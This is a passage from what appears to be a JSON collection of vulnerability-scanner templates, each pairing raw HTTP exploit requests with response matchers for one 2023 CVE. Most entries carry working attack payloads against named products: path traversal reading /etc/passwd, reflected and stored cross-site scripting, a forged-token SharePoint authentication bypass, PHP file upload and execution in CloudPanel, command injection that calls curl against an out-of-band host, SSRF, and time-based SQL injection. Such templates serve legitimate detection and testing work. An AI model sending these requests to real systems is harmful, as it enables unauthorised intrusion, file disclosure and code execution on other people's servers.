/api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-2624","info":{"name":"KiviCare WordPress Plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src onerror=alert(document.domain)> appointment","status\":true"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"<script>alert(document.domain)</script>\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: </span><script>alert(document.domain)</script>\n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: </span><script>alert(document.domain)</script>\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n  \"username\":\"2\",\n  \"password\":\"admin\",\n  \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30625","info":{"name":"Rudder Server < 1.3.0-rc.1  - SQL Injection","severity":"high"},"requests":[{"raw":["POST /v1/warehouse/pending-events HTTP/1.1\nHost: {{Hostname}}\n\n{\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["error getting pending"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-43654","info":{"name":"PyTorch TorchServe SSRF","severity":"critical"},"requests":[{"raw":["POST /models?url=http%3a//{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-39024","info":{"name":"Harman Media Suite <= 4.2.0 - Local File Disclosure","severity":"high"},"requests":[{"raw":["GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"plcm-content-channel\", \"privacy\", \"coverImage\")","contains(content_type, \"application/vnd.plcm.plcm-content-channel-list+json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"channelId","group":1,"regex":["\"channelId\":\"([^\"]+)\""],"internal":true}]},{"raw":["GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"callId\", \"displayName\", \"duration\")","contains(content_type, \"application/vnd.plcm.plcm-csc+json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"</script><img src=1 onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"mojoPortal\", \"mojo-accordion\", \"mojo-tabs\")","contains(body, \"><svg/onload=alert()\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4110","info":{"name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Booking\", \"Arrival\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38194","info":{"name":"SuperWebMailer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<img src=1 onerror=alert(document.domain) />\")","contains(tolower(body_1), \"superwebmailer\")","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST 